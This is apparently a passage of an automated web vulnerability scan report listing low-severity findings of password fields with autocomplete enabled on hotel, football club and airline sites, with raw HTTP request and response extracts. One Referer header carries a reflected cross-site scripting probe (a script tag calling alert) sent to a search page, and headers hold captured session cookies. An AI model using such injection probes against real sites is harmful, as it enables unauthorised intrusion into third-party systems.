User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...

15.8. http://www.hotelplanner.com/Search/Index.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...

15.9. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...

15.10. http://www.manutd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...

15.11. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="login regform LoginContainerStyles">
<form method="post" action="" id="members">
<br />
...[SNIP]...
</label>
<input name="phcontent_0$phoneunitedcontent_0$phcolumn1_1$password" type="password" id="phcontent_0_phoneunitedcontent_0_phcolumn1_1_password" tabindex="6" title="Password:" />
<div class="rule" style="margin-bottom: 15px;">
...[SNIP]...

15.12. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United/Login.aspx%3fredirectPath%3d%2fen%2fFanzone%2fCompetition-And-Polls%2fCompetition.aspx%3fid%3d%257BA04F2C18-1A4F-437D-B2BF-26E32C2683B7%257D%26regmode%3dfull" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United/Login.aspx" class="hiddeninput" />
...[SNIP]...

15.13. http://www.manutd.com/Search-Results.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Search-Results.aspx%3fqs%3dmanutd_frontend%26catTxt%3d%26searchText%3dxss" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Search-Results.aspx" class="hiddeninput" />
...[SNIP]...

15.14. http://www.manutd.com/en.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...

15.15. http://www.manutd.com/en/Club/Sponsors.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Club/Sponsors.aspx%3fsponsorid%3d%257BF745DA14-CB5E-4A81-816A-8DB410E47A75%257D" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Club/Sponsors.aspx" class="hiddeninput" />
...[SNIP]...

15.16. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Fanzone/Competition-And-Polls.aspx" class="hiddeninput" />
...[SNIP]...

15.17. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" class="hiddeninput" />
...[SNIP]...

15.18. http://www.manutd.com/en/One-United.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United.aspx" class="hiddeninput" />
...[SNIP]...

15.19. http://www.turkishairlines.com/en-CA/index.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/index.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en-CA/index.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
